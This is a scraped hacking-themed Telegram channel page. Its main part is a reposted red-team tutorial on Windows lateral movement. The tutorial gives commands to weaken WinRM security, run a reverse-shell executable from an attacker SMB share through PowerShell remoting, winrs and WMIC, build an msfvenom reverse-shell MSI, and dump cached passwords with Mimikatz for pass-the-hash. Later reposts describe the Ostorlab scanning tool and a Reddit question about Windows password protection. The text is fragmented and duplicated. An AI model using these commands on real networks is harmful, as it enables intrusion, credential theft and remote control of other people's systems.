Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
_hosts file (by using ssh-keygen -R) ssh-keygen -R 127.0.0.1 ssh server@127.0.0.1 -p 7000 https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPqqzyrQ7EW3Tey1zuCkLJpqD7LRjn7fwvS85HgwXw96ZKHAZ0eJp7dqk1hHXkKq-e7CiBc6BjZrH2dkNoLD89xSE34YxkhUclbVZV…
s, and other manageable entities. It uses port 5985 for HTTP transport and 5986 for HTTPS Transport.

On server and client versions of the Windows operating system, Enable-PSRemoting allows the administrator to access the remote shell using Powershell for private and domain networks through WinRM service.

Read Microsoft’s documentation here about WinRM

First, to set up WinRM we need to execute the following commands in an Admin Powershell window only. This would enable winrm, allow HTTP connection (as by default no SSL cert is there for HTTPS in a system) and allow all users by adding them in trusted hosts.
Enable-PSRemoting -Force
winrm quickconfig
winrm set winrm/config/service '@{AllowUnencrypted="true"}'
Set-Item WSMan:localhost\client\trustedhosts -value *
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6GyelLop_vSBT9yPM9a2MasOxA39suZneIWH4nFWDmOldt4HdJWQiBUXhKHVTIuSI_bsUz0NZRTeR8qv9O9UcoN3KoPpjIabVBeYtS52EHZNG8d-brHpFeB-33hzlOwiqvm_Qlfubao15sGr9pxGplfuyGn2Eunn-rh7NmFVslcelsDLIck-xrGorww/s16000/44.png?w=640&ssl=1

For WinRM service, we can manually traverse the config too like this and setting/changing any value.
cd WSMan:\localhost\Client
set-item .\allowunencrypted $true
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl-r6hSFv1YpUbbocUjB8Etrt_1P7QrEcpchcoP3xj0_IppxdfIqruM2P-HlHrPcM3hyGh99cjPcMN7UDW-OJJJads1aWRvrhBDQZpKC-n7BwMTV_xrgw07eHmKNLoddWlAPkNJHcfvET8ERwHskT1GKIj9EByyIIUg7S9rdTlwYc440bon91baDq2hQ/s16000/45.png?w=640&ssl=1

For a domain environment, often tools like WinRS won’t work due to Kerberos. Hence, we need to activate basic authentication mechanism.
set-item  WSMan:\localhost\Service\Auth\Basic $true
set-item  WSMan:\localhost\Service\AllowUnencrypted $true
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8Su18pZJMbVnmPrFBO0sW-MgDZ0RMqLw_iL12iEV_qCrTfkyoQpN7z7XFpC4evdgMvw6JcaLanq6CKL8ec8PLeN9GJQYQtJTSVfk-4KeE4Xuj39Ktfw9_LJFUkUmgXEehBAIkAcdxSEx2iKO-myKrD10bg6DUNKdjNzyXjXaLcwlfl2qgg8x-n7cLbg/s16000/46.png?w=640&ssl=1

New-PSSession Powershell

New-PSSession command in powershell creates a new persistent powershell remote session. By providing in the remote credentials, you see that we have connected to the server. Useful in scenarios where one system has access to a target/destination server and we need to connect to it but our attacker system can’t reach it.

We can further execute the malicious executable that we have kept in our SMB share for further lateral movement.
New-PSSession -ComputerName 192.168.1.2 -Credential (Get-Credential)
Enter-PSSession 2
cmd.exe /c \\192.168.1.4\sharename\shell.exe
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtIBJUDn3AV2zdUgf2o1GaxlQX16lqYxDw9_R0QsoqiCJFwhVKBwB5DDeiFyvBnHEasQSike5XvCo7Bi0ZtsF-ZdbBOewg1H9l2ZFehyiSjWvKa4_jJBxKq-ZwSCOm70sVE8nvwI7NOtEx12Wy_Vi6KMqpNMGYcRXimyeHchb6von6rQJjAufB8lJigQ/s16000/47.png?w=640&ssl=1

You see, now server has bypass the incoming connections of firewall which were restricting a user to connect to it. We have made server connect to us instead!

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFY2PJzRD8iHXa-IWp9xpE5jsp_m-42bI6UN_wdFIXYp0ZGUy9l_Srtheq-mE69H-tWUURMbTdarKX5WTYPlKUWBUPCa4ndT441XNR9V_DS5veeFhIyoSSp__HAFAGdrooI3LjkwaWb5RJf5_rIa0rvjmKw8tdn7gt03HpJH-P2MFKaW6PYkaGwWjlKA/s16000/48.png?w=640&ssl=1

It gives us a neat reverse shell!

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3CHqR_1zCrCqPyQiPEbWRMpGcpwXXbDsqDB06nAqSDzYJXCTw7FIe_hw5WBHHW75tK6lWbd17BNfIpetXla1481_TQ6jcgN1LZoeWMALLOL_T4JHfOQ-TrmxEDadPcGIl2s-I-zosIFLRWL6eylcgaF0HOOhE-Aa3fNLqeTUGPvBraILdXsicJYO1ow/s16000/49.png?w=640&ssl=1

Invoke-Command Powershell

Invoke-Command is a cmdlet in Powershell that runs specified commands on remote systems by using WinRM interoperability. Admins use this to auto-install tools/software etc. But it can be used for lateral movement too. By specifying our command in “scriptblock” we can execute it. “-Credent[...]
Hacking Articles Tips Tricks Videos Tutorials
s, and other manageable entities. It uses port 5985 for HTTP transport and 5986 for HTTPS Transport. On server and client versions of the Windows operating system, Enable-PSRemoting allows the administrator to access the remote shell using Powershell for…
ial” flag lets user input credentials which can also be replaced by creating a block and feeding it to the STDIN.

Invoke-Command dc1.ignite.local -Credential $cred -ScriptBlock {cmd.exe /c \\192.168.1.4\sharename\shell.exe}

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaYLwxeGJxLbIRBshsbx1dIZoVWVJkcQr2a-KCyW6AO5-beARxtedQ2shNifIyRy-1gBss3jnaVPE7WaZuwADpnUn6O-H60ejZM9EuKjQ78vcCUOScbnHswXzFetDMK5qwHHeESaRsuyVe4GHfJ42mQbMxYRizwb2Udh5PvpJomrHNW9NvQf_epJ6bg/s16000/50.png?w=640&ssl=1

This gives us a healthy shell!

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeolN8bKPSzdb9c7zF7VBvp-8dmsSh6kfnsh8TTwqS9_6x1xvhX9hLYo65neKyxDRDDGP7yLl01Ion0r7y3lI7i17BvJn2dlYKAlKGKLpkW2YQLye5b3kc588MqXBEQVuEdlfOj9yrF4SYu8021ujm1CVs0u_83tVpEuaX8Sv3RyNDfQ5ryrAL5P7zkw/s16000/51.png?w=640&ssl=1

Winrs

Winrs stands for Windows Remote Shell and is the same as New-PSSession. It has existed in Windows since Server 2008. Winrs can be used to execute code on the remote system. It only utilizes basic authentication. So, shell.exe kept in our smbshare can be executed like this:
winrs /r:dc1 /username:Administrator /password:Ignite@987 "cmd.exe /c \\192.168.1.4\sharename\shell.exe"
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_cZbYaaIdGn_kHhTbcj9yWoxh9Auz0BaWt8KHAYz64NmRldyUXYmedZabfCmHKGF_0PVDztPiwfQBGuveCRRKJgk6W68vFXKSQ_7bCjRm7C0BtOKRQKBK6pT7wTQWhaRDX4hIWtnr2S6ztd2r-37MF72vlrnU6IsYs4Imx_WURCtD2VrXwUKefnNQPg/s16000/52.png?w=640&ssl=1

Which gives us a reverse shell successfully!

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgQskD93WiZmpytEp4ePxkzLLAMP1e_GChNTd5HH4vhOLb5WkpCoGxMx2pkMSWk1H8WphnhtGA3OWvatKiDpAgsSec3duBS3p4tszN3t5YesJ_zEWSD4qo-Rg5uJ-q4DsA1p0sBFyWB0_XmKRAvKaTShzQQ7ldNVr7hR0Pl6BApQv-zyZh7xg2MiyePQ/s16000/53.png?w=640&ssl=1
Evil-Winrm

Evil-WinRM is a very popular tool used by Red Teamers to conduct lateral movement through network by utilizing WinRM. In the background, it also uses windows remote shell capabilities but has some nifty features added on top of it. It is coded in ruby and can be installed with gem install evil-winrm. After installation, it can be used to connect to a remote server like:
evil-winrm  -i 192.168.1.2 -u Administrator -p 'Ignite@987'
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYg6U0ZeemxU4gSzJMNwjomuG1_dISzpabnuKAxLAzJVZ5WIyFj-WtG-sqC1i7sMOXCEB1_Nosv-P3OuaV6vZwOxMqiZZJe2hdPVwCkvapk3Xfz3vJStbvBWXzHzPfbQBplBQGZ1zclpNZdG1njlvLDv8fULViSJNRhB-z-omxVZrjJNrGrQ9dl-lBNQ/s16000/54.png?w=640&ssl=1

Now, I have created a folder called binaries under /root, which includes a Mimikatz powershell script (found here).

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio1MGF2nwP-jBx983yaIDr3FgqAtrru0pYo-3BVTBdjJIq_yedBniDkfBbigLZJM7GkQFRqGN5Pzn2yZ0bqJCFtJLCimh3Gc8ZxiIbaVBRNrPjwm09KmNoUNeEGrzEb1_DbJI_QCJwVb4MNxc0wKmxfTGintbcp-NnO1RCSfy6b4rrPVpwRXZq8XM_KQ/s16000/55.png?w=640&ssl=1

Evil-WinRM can upload these powershell scripts (kept in a folder) and let us execute its powershell functions! For that we use -s and provide the path of binaries folder. Thereafter, we can use Invoke-Mimikatz and as you can see, mimikatz has worked and dumped cached passwords in the server.
evil-winrm  -i 192.168.1.2 -u Administrator -p 'Ignite@987' -s '/root/binaries'
Invoke-Mimikatz.ps1
Invoke-Mimikatz
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcbS78xAmzph_q_B_6tcsrxelhdkdIB1vjRbGZmBdAPLOXVT6nlrBv-Pz_hDf9mwvVFknagaTQqffC9Jzq8PG8GuWOYkvMHCS5KRnL5rHQHCqqnYEksG3wizKIE2uAOKZdctyA4qy6o_jss8CGL1m2cECD57fw2F3UT_tTRxw5b0qbJ3u37WqarOQIvA/s16000/56.png?w=640&ssl=1 Lateral Movement through MimikatzMimikatz contains many options that aid with lateral movement. One such is dumping passwords. We can do that using the sekurlsa module:
privilege::debug
sekurlsa::logonpasswords
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI9OIyMhkokK_6qEAfdYzfodRcH57ZcNx4VQOGNEV237T6ic2EUXLxjvGAslilj[...]
Hacking Articles Tips Tricks Videos Tutorials
ial” flag lets user input credentials which can also be replaced by creating a block and feeding it to the STDIN. Invoke-Command dc1.ignite.local -Credential $cred -ScriptBlock {cmd.exe /c \\192.168.1.4\sharename\shell.exe} https://i0.wp.com/blogger.goo…
3PdULWEVzhkZMQ-JTwu5OrrUAQ57fXtzSDCKTj_gLnVxd-wjJ0siNIhxDGqrSU6vCnSlqqm-OeuXhY4NwhR8UN0Qk-mDVEQJ1KqALxL2jcGQgs_luhkf4vH7G2N2Q/s16000/57.png?w=640&ssl=1

These hashes can further be used with psexec to conduct pass the hash attacks! Lateral Movement through WMIThe WMI command-line (WMIC) utility provides a command-line interface for Windows Management Instrumentation (WMI). WMIC is compatible with existing shells and utility commands. Wmi can also be used to execute commands remotely. This is achieved by using /node flag. For example, in the example below we are creating a new process call which will execute our shell kept in our SMB server on node 192.168.1.2
wmic /node:192.168.1.2 /user:administrator process call create "cmd.exe /c \\192.168.1.4\sharename\shell.exe"
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_4qbiG4PXOs2Chp1oxx7Rh0SDwUG0NkicULLX5wqaiuBUX4SMDy0WiL-leR3f37X-37Uur75mjcJxtRivpYDXI8py0IdljcFLaZ9Yk4xXYfqBS7xMYRtkyIuuZJj-op1-vJuaQRMMcXhExKitul7HSpE5KZMWYX_2_xSKRHgmZxt01ruKdANenVzPuA/s16000/58.png?w=640&ssl=1

As you can see, execution was successful and we have received a reverse shell

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj30l8N60xGqiUq67kO2atLX1AzEZ6RXCFKGJ0RWhXhYjU5O_J0qUIahkrfkwXBvRpbMStcpxEMFcamsyfmm2DxJp0X4bV5pZUbZW2Qq7abAGIMDyBlghjjCbsS21PcuMC4HAtuCpYRkG1g6CnifvvfvftXYd7WiP8EOBKmfN89jqRSuj8fpbtg7013Lw/s16000/59.png?w=640&ssl=1 Lateral Movement through Invoke-WmiMethodAs for any good utility that existed as a binary in windows, Microsoft has created an equivalent powershell cmdlet for it. Invoke-WmiMethod is a cmdlet that does the same as wmic in the example above. Newer Invoke-CimMethod in PS 5.1+ does the same thing. Refer here.

To use Invoke-WmiMethod using CLI, we need to craft a command. Thanks to @spotheplanet for this technique. We can use generic Invoke-WmiMethod too but it requires GUI which we generally don’t have in Red Team scenarios.

In this technique, we will create a malicious MSI file, and install it in the destination server.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=1337 -f msi > shell.msi
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVYMOoSCZU7uh9qT7zS6cgZXl3py22eol14UGpsPcyLbCZZN-B_O3kcnWQMxL7BOfqBjkOCalEVYltyWaYhsXePRt9bIJtKe2CYXWKDVJzqHepok0l_qeTI5CfbTKWAmC0vCl-KkIJvlqfnShizD63-_d5XbjcxT9rzWlX60yTwMDkxC0tMtN_OVG0VA/s16000/60.png?w=640&ssl=1

Now, in the CLI of the compromised victim, we put in the following command. This command basically provides credentials (Administrator:Ignite@987) to Invoke-WmiMethod and installs an MSI file put in our SMB share.
$username = 'Administrator';$password = 'Ignite@987';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Invoke-WmiMethod -Path win32_product -name install -argumentlist @($true,"","\\192.168.1.4\sharename\shell.msi") -ComputerName dc1 -Credential $credential
https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOdFlLHMFQ_2ueT5Gel4vFF4eMVdOHpi8ny_UTapDcKSXlaUlB4CkMDmrTFfvvBZrQguOiOKzHwD3AfISjw7h-PbOJSPUnZwNWsSzxgyL44OJ6q-YHiKfQlQ6nHtKonr7bn8h0nRPyTNvO9kr_y1mfBbQ6BUNKqQ6x7jOam2UP9X0DioZZR4N7BzU2LQ/s16000/61.png?w=640&ssl=1

On our reverse listener, you can see a stable shell has now popped up!

https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDgtugo9MM4wxLMCy0cbYdMV6MPR6Qe4JcCWPNaBt1WJ0bQeNFnfeNNIQKmHJuH6I7u-HzIcfmO7ndqeDosaNhCbic6EFUZOL_7NCzUrkHNkITfDq9BJ86JHdMHW_Wr9p5FSaB09dNG89WwxI0Ec8-rzr-hHzLbs1s6UPwGsLOKrvaa4mv_0y2-LhzrQ/s16000/62.png?w=640&ssl=1 ConclusionLateral Movement is an essential step in red teaming as it leads to privilege escalation and network compromise. The article talked about Remote Services and how they can be utilized for lateral movement scenarios during Red Team Assessments. These services inherently have the capability to interact with remote systems. We demonstra[...]
Ostorlab - A Security Scanning Platform That Enables Running Complex Security Scanning Tasks Involving Multiple Tools In An Easy, Scalable And Distributed Way
http://www.kitploit.com/2022/03/ostorlab-security-scanning-platform.html
The Sales Pitch If this is the first time you are visiting the Ostorlab Github page, here is the sales pitch. Security testing requires often chaining tools together, taking the output from one, mangling it, filtering it and then pushing it to another tool. Several tools have tried to make the process less painful with limited success. Ostorlab addresses the same challenge by simplifying the hardest part and automating the boring and tedious part.
To do that, Ostorlab focuses on the following: Ease of use with simple one command-line to perform all tasks Developer Experience through project documentation, tutorials, SDK and templates Scalability and Performance by using efficient serialisation format and proven industry standard for all of its components To do that, Ostorlab ships with: A simple, yet powerful SDK to make simple cases effortless while supporting the complex one, like distributed (https://www.kitploit.com/search/label/Distributed) locking, QPS limiting, multiple instance parallelization ... A battle-tested framework that has been powering Ostorlab Platform for years and used to perform complex dynamic analysis setup and demanding static analysis (https://www.kitploit.com/search/label/Static%20Analysis) workloads running on multiple machines. Performant and scalable design, thanks to the use of message queue with dynamic routing, binary and compact message serialisation with protbuf, universal file format using docker image, resilient thanks to docker swarm mode to cite a few A store of agents that make is to use and discover tools to add your toolset An automated (https://www.kitploit.com/search/label/Automated) builder to take the hassle away of building and publishing. A GUI to prepare and write down your tool collection setup Focus on documentation, multiple tutorials and upcoming videos and conference presentations A ready to use one-click template repo to get started. Requirements For some tasks, like running scans locally, Docker is required. To install docker, please see the following instructions (https://docs.docker.com/get-docker/). Installing Ostorlab is shipped as a Python package on Pypi. To install, simply run the following command if you have pip already installed. pip install -U ostorlab Getting Started To perform your first scan, simply run the following command: ostorlab scan run --install --agent agent/ostorlab/nmap --agent agent/ostorlab/openvas --agent agent/ostorlab/tsunami --agent agent/ostorlab/nuclei ip 8.8.8.8 This command will download and install the following scanning agents: agent/ostorlab/nmap agent/ostorlab/tsunami agent/ostorlab/nuclei agent/ostorlab/openvas And will scan the target IP address 8.8.8.8 To check the scan status: ostrlab scan list Once the scan has completed, to access the scan results: ostorlab vulnz describe --vuln-id ">ostorlab vulnz list --scan-id
ostorlab vulnz describe --vuln-id The Store Ostorlab lists all agents on a public store where you can search and also publish your own agents.
In addition, the store, a graphical agent group builder is also available to compose multiple agents and see how they would interact with each other.
  The builder also helps with generating the agent group YAML file to set special arguments that can be passed to agents to control their behavior.
Publish your first Agent To write your first agent, check out the full tutorial here (https://docs.ostorlab.co/tutorials/write-an-ostorlab-agent/). Once you have written your agent, you can publish it on the store for others to use and discover it. The store even handles agent building and will automatically pick up new releases from the git repo.
Hacking Articles Tips Tricks Videos Tutorials
GIF
KitPloit - PenTest Tools!
Ostorlab - A Security Scanning Platform That Enables Running Complex Security Scanning Tasks Involving Multiple Tools In An Easy, Scalable And Distributed Way

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZlatHQU1laDv407hhX_-D_1aGtFqTaDrwLd4sXeAYf45BYEkEQEHJd9UvZP3F1JoWEPS3BWIrXEpxpTFW2bN_L9cHhKh6843G3nJKEHteWqFoMW1gwty4Kvw2Crm23aUgfF_v7CIWSv13WiiyWFey3N6wWVy_bg1KUbeuBwjNn4mwMRGnp6lvQc2c/w592-h640/ostorlab_5_scan_run.gif The Sales PitchIf this is the first time you are visiting the Ostorlab Github page, here is the sales pitch.

Security testing requires often chaining tools together, taking the output from one, mangling it, filtering it and then pushing it to another tool. Several tools have tried to make the process less painful with limited success. Ostorlab addresses the same challenge by simplifying the hardest part and automating the boring and tedious part.
To do that, Ostorlab focuses on the following:

* Ease of use with simple one command-line to perform all tasks
* Developer Experience through project documentation, tutorials, SDK and templates
* Scalability and Performance by using efficient serialisation format and proven industry standard for all of its components

To do that, Ostorlab ships with:

* A simple, yet powerful SDK to make simple cases effortless while supporting the complex one, like distributed locking, QPS limiting, multiple instance parallelization ...
* A battle-tested framework that has been powering Ostorlab Platform for years and used to perform complex dynamic analysis setup and demanding static analysis workloads running on multiple machines.
* Performant and scalable design, thanks to the use of message queue with dynamic routing, binary and compact message serialisation with protbuf, universal file format using docker image, resilient thanks to docker swarm mode to cite a few
* A store of agents that make is to use and discover tools to add your toolset
* An automated builder to take the hassle away of building and publishing.
* A GUI to prepare and write down your tool collection setup
* Focus on documentation, multiple tutorials and upcoming videos and conference presentations
* A ready to use one-click template repo to get started. RequirementsFor some tasks, like running scans locally, Docker is required. To install docker, please see the following instructions. InstallingOstorlab is shipped as a Python package on Pypi. To install, simply run the following command if you have pipalready installed. pip install -U ostorlabGetting StartedTo perform your first scan, simply run the following command: ostorlab scan run --install --agent agent/ostorlab/nmap --agent agent/ostorlab/openvas --agent agent/ostorlab/tsunami --agent agent/ostorlab/nuclei ip 8.8.8.8This command will download and install the following scanning agents:

* agent/ostorlab/nmap* agent/ostorlab/tsunami* agent/ostorlab/nuclei* agent/ostorlab/openvasAnd will scan the target IP address 8.8.8.8To check the scan status: ostrlab scan listOnce the scan has completed, to access the scan results: ostorlab vulnz list --scan-id <scan-id
ostorlab vulnz describe --vuln-id <vuln-id
The StoreOstorlab lists all agents on a public store where you can search and also publish your own agents. https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE3JhiBz4jaqf2n-E_GvCakDDIAos0rFWVpwSHSG7fuZEg2LTcFwJALhSDZDdevF2V1S7ImCmr1teSlfUCME74rYuX2A8q-8rW5M2w-hGFCshugvSL9ttsa8nubZKVksrG3XchuJsXYc8v1iw0dAYYCvIOgj4u6dpMokPyRlO6N74J2FCLk5JUxlmR/w640-h492/ostorlab_6_store2.gif In addition, the store, a graphical agent group builder is also available to compose multiple agents and see how they would interact with each other. https://blogger.googleusercontent.com/img/b/R29v[...]
Hacking Articles Tips Tricks Videos Tutorials
KitPloit - PenTest Tools! Ostorlab - A Security Scanning Platform That Enables Running Complex Security Scanning Tasks Involving Multiple Tools In An Easy, Scalable And Distributed Way https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZlatHQU1laDv407hhX_…
Z2xl/AVvXsEi1c3j9rrC0qnOkqlRVjaHUniqAJRD_4FFeGkTfHQlYOLridGaWtmQBQxZGuQEqUQyXD0s9zUYr7LsQPk8zG0pEqmKYB50Qh9A_Oeg1FV-KI_MSGa_K-fm0qVYK6NpETdw0sDKbebs53P0e2p3msIJOQEr6LOD1J7Sfs_H9bUaAH4-7e_4uAY9RsbLF/w640-h492/ostorlab_7_store.gif The builder also helps with generating the agent group YAML file to set special arguments that can be passed to agents to control their behavior. https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiupNGLaocCV-rP77-pP1f9CVl1cdam4s5P38h9DjuhiOfy1ZGdGHfE24HCvMYrMCKE3dck2xVEvqaNoLm-q0joYISPcL5tLp5UoHhko3-Fjm1fXTP7mrGCenFiKU2-03vFQBaHK4C3NTaDucVd0rg1rCH-fDd3PS5SlrMc8KIAXZzsM6FDP93lgHd0/w640-h492/ostorlab_8_agent_group.gif Publish your first AgentTo write your first agent, check out the full tutorial here.

Once you have written your agent, you can publish it on the store for others to use and discover it. The store even handles agent building and will automatically pick up new releases from the git repo. https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjERNIfS-pRBzr0FmXDUdf6sfD0RisBfggpTokX7-0aJxc-mFiNrp-oUAYJ-neDq1VUJXz0JXyHxPKEjTjF5dxNgt1PmyKP99LUa-V75DDYdQhMCeDnE54608YvDfE9Fsk2w9f77SrJy4sSp2KVij_FPIebfLKe7kl4zeQagYHdXiGqs4YPT8bO6BMA/w640-h492/ostorlab_9_build.gif Download Ostorlab
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How to protect Win10 access password?

There are a ton of videos on YouTube, that claim to show how to bypass a Windows 10 password and get access to the pc (like this https://youtu.be/YBFAzK9mgNI)

I wonder if there is a way to prevent this? Is there a way tomake my password hack proofed and protect my data? Talking only about scenarios when other person may have actual physical access to my computer and it's being turned off.

Thanks for answers.

submitted by /u/redditbrainleszombie
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video